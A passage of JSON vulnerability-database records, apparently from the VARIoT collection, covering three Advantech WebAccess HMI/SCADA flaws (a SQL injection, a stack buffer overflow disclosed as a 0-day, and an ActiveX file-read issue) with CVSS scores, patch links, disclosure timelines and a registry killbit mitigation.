CERT", "id": "ICSA-14-079-03", "trust": 3.1 }, { "db": "BID", "id": "66740", "trust": 2.0 }, { "db": "CNVD", "id": "CNVD-2014-02243", "trust": 1.0 }, { "db": "CNNVD", "id": "CNNVD-201404-169", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-001974", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-1938", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-077", "trust": 0.7 }, { "db": "OSVDB", "id": "105572", "trust": 0.6 }, { "db": "SECUNIA", "id": "57873", "trust": 0.6 }, { "db": "IVD", "id": "0AD07D9E-1EDF-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "1654B8D4-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68256", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1654b8d4-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-077" }, { "db": "CNVD", "id": "CNVD-2014-02243" }, { "db": "VULHUB", "id": "VHN-68256" }, { "db": "BID", "id": "66740" }, { "db": "JVNDB", "id": "JVNDB-2014-001974" }, { "db": "CNNVD", "id": "CNNVD-201404-169" }, { "db": "NVD", "id": "CVE-2014-0763" } ] }, "id": "VAR-201404-0538", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1654b8d4-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02243" }, { "db": "VULHUB", "id": "VHN-68256" } ], "trust": 1.53470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1654b8d4-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02243" } ] }, "last_update_date": "2024-11-23T21:45:11.437000Z", "patch": { "_id": null, "data": [ { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" }, { "title": "Advantech WebAccess DBVisitor.dll special SOAP request SQL injection vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/44778" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-077" }, { "db": "CNVD", "id": "CNVD-2014-02243" }, { "db": "JVNDB", "id": "JVNDB-2014-001974" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-89", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68256" }, { "db": "JVNDB", "id": "JVNDB-2014-001974" }, { "db": "NVD", "id": "CVE-2014-0763" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-079-03" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/66740" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0763" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0763" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/105572" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57873" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-077" }, { "db": "CNVD", "id": "CNVD-2014-02243" }, { "db": "VULHUB", "id": "VHN-68256" }, { "db": "JVNDB", "id": "JVNDB-2014-001974" }, { "db": "CNNVD", "id": "CNNVD-201404-169" }, { "db": "NVD", "id": "CVE-2014-0763" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "db": "IVD", "id": "1654b8d4-2352-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-14-077", "ident": null }, { "db": "CNVD", "id": "CNVD-2014-02243", "ident": null }, { "db": "VULHUB", "id": "VHN-68256", "ident": null }, { "db": "BID", "id": "66740", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2014-001974", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201404-169", "ident": null }, { "db": "NVD", "id": "CVE-2014-0763", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "1654b8d4-2352-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-077", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02243", "ident": null }, { "date": "2014-04-12T00:00:00", "db": "VULHUB", "id": "VHN-68256", "ident": null }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66740", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001974", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-169", "ident": null }, { "date": "2014-04-12T04:37:31.440000", "db": "NVD", "id": "CVE-2014-0763", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-077", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02243", "ident": null }, { "date": "2015-07-24T00:00:00", "db": "VULHUB", "id": "VHN-68256", "ident": null }, { "date": "2014-04-17T00:40:00", "db": "BID", "id": "66740", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001974", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-169", "ident": null }, { "date": "2024-11-21T02:02:46", "db": "NVD", "id": "CVE-2014-0763", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-169" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess of DBVisitor.dll In SQL Injection vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001974" } ], "trust": 0.8 }, "type": { "_id": null, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "0ad07d9e-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1654b8d4-2352-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201404-169" } ], "trust": 1.0 } }
var-201708-1708
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-541" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-541" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-541", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-541", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-541" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-541" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4083", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-541", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-541" } ] }, "id": "VAR-201708-1708", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:46:24.989000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\73888E2B-FF04-416c-8847-984D7FC4507FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-541" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-541" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-541", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-541", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-541", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess RtspVapgDecoderNew2 PMSettingData3D Height Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-541" } ], "trust": 0.7 } }
var-201407-0237
Vulnerability from variot
The BrowseFolder method in the bwocxrun ActiveX control in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a crafted call. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists with the bwocxrun ActiveX control, which allows for navigation from the network to the local file system. When combined with system settings and other components included as part of the installation, this allows for the activation of ActiveX controls resident on the local file system (even if not installed) without user interaction. An attacker can use this to install vulnerable controls on the target system. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a remote security weakness. This may aid in further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a security vulnerability in the 'BrowseFolder' method in the bwocxrun ActiveX control of Advantech WebAccess 7.1 and earlier
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201407-0237", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.0" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "7d7fc401-463f-11e9-82e2-000c29342cb1" }, { "db": "IVD", "id": "e49f790a-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-245" }, { "db": "CNVD", "id": "CNVD-2014-04532" }, { "db": "JVNDB", "id": "JVNDB-2014-003491" }, { "db": "CNNVD", "id": "CNNVD-201407-480" }, { "db": "NVD", "id": "CVE-2014-2368" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003491" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-14-245" } ], "trust": 0.7 }, "cve": "CVE-2014-2368", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-2368", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-2368", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-04532", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d7fc401-463f-11e9-82e2-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e49f790a-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-70307", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-2368", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-2368", "trust": 0.8, "value": "Medium" }, { "author": "ZDI", "id": "CVE-2014-2368", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-04532", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201407-480", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "7d7fc401-463f-11e9-82e2-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "e49f790a-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-70307", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "7d7fc401-463f-11e9-82e2-000c29342cb1" }, { "db": "IVD", "id": "e49f790a-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-245" }, { "db": "CNVD", "id": "CNVD-2014-04532" }, { "db": "VULHUB", "id": "VHN-70307" }, { "db": "JVNDB", "id": "JVNDB-2014-003491" }, { "db": "CNNVD", "id": "CNNVD-201407-480" }, { "db": "NVD", "id": "CVE-2014-2368" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The BrowseFolder method in the bwocxrun ActiveX control in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a crafted call. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists with the bwocxrun ActiveX control, which allows for navigation from the network to the local file system. When combined with system settings and other components included as part of the installation, this allows for the activation of ActiveX controls resident on the local file system (even if not installed) without user interaction. An attacker can use this to install vulnerable controls on the target system. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a remote security weakness. This may aid in further attacks. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a security vulnerability in the \u0027BrowseFolder\u0027 method in the bwocxrun ActiveX control of Advantech WebAccess 7.1 and earlier", "sources": [ { "db": "NVD", "id": "CVE-2014-2368" }, { "db": "JVNDB", "id": "JVNDB-2014-003491" }, { "db": "ZDI", "id": "ZDI-14-245" }, { "db": "CNVD", "id": "CNVD-2014-04532" }, { "db": "BID", "id": "68715" }, { "db": "IVD", "id": "7d7fc401-463f-11e9-82e2-000c29342cb1" }, { "db": "IVD", "id": "e49f790a-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-70307" } ], "trust": 3.51 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-2368", "trust": 4.5 }, { "db": "ICS CERT", "id": "ICSA-14-198-02", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201407-480", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2014-04532", "trust": 1.0 }, { "db": "BID", "id": "68715", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-003491", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2061", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-245", "trust": 0.7 }, { "db": "IVD", "id": "7D7FC401-463F-11E9-82E2-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "E49F790A-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-70307", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "7d7fc401-463f-11e9-82e2-000c29342cb1" }, { "db": "IVD", "id": "e49f790a-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-245" }, { "db": "CNVD", "id": "CNVD-2014-04532" }, { "db": "VULHUB", "id": "VHN-70307" }, { "db": "BID", "id": "68715" }, { "db": "JVNDB", "id": "JVNDB-2014-003491" }, { "db": "CNNVD", "id": "CNNVD-201407-480" }, { "db": "NVD", "id": "CVE-2014-2368" } ] }, "id": "VAR-201407-0237", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "7d7fc401-463f-11e9-82e2-000c29342cb1" }, { "db": "IVD", "id": "e49f790a-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04532" }, { "db": "VULHUB", "id": "VHN-70307" } ], "trust": 1.53470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "7d7fc401-463f-11e9-82e2-000c29342cb1" }, { "db": "IVD", "id": "e49f790a-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04532" } ] }, "last_update_date": "2024-11-23T22:02:05.073000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://webaccess.advantech.com/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02" }, { "title": "Advantech WebAccess bwocxrun unsafe ActiveX control information disclosure vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/47825" }, { "title": "AdvantechWebAccessCHNNode_20140606_3.4.3", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=50905" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-245" }, { "db": "CNVD", "id": "CNVD-2014-04532" }, { "db": "JVNDB", "id": "JVNDB-2014-003491" }, { "db": "CNNVD", "id": "CNNVD-201407-480" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-70307" }, { "db": "JVNDB", "id": "JVNDB-2014-003491" }, { "db": "NVD", "id": "CVE-2014-2368" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-198-02" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2368" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2368" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-245" }, { "db": "CNVD", "id": "CNVD-2014-04532" }, { "db": "VULHUB", "id": "VHN-70307" }, { "db": "JVNDB", "id": "JVNDB-2014-003491" }, { "db": "CNNVD", "id": "CNNVD-201407-480" }, { "db": "NVD", "id": "CVE-2014-2368" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "7d7fc401-463f-11e9-82e2-000c29342cb1" }, { "db": "IVD", "id": "e49f790a-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-245" }, { "db": "CNVD", "id": "CNVD-2014-04532" }, { "db": "VULHUB", "id": "VHN-70307" }, { "db": "BID", "id": "68715" }, { "db": "JVNDB", "id": "JVNDB-2014-003491" }, { "db": "CNNVD", "id": "CNNVD-201407-480" }, { "db": "NVD", "id": "CVE-2014-2368" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-07-24T00:00:00", "db": "IVD", "id": "7d7fc401-463f-11e9-82e2-000c29342cb1" }, { "date": "2014-07-24T00:00:00", "db": "IVD", "id": "e49f790a-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-245" }, { "date": "2014-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2014-04532" }, { "date": "2014-07-19T00:00:00", "db": "VULHUB", "id": "VHN-70307" }, { "date": "2014-07-18T00:00:00", "db": "BID", "id": "68715" }, { "date": "2014-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003491" }, { "date": "2014-07-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-480" }, { "date": "2014-07-19T05:09:27.753000", "db": "NVD", "id": "CVE-2014-2368" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-245" }, { "date": "2014-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2014-04532" }, { "date": "2014-07-23T00:00:00", "db": "VULHUB", "id": "VHN-70307" }, { "date": "2014-07-22T00:07:00", "db": "BID", "id": "68715" }, { "date": "2014-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003491" }, { "date": "2014-07-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-480" }, { "date": "2024-11-21T02:06:09.773000", "db": "NVD", "id": "CVE-2014-2368" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", 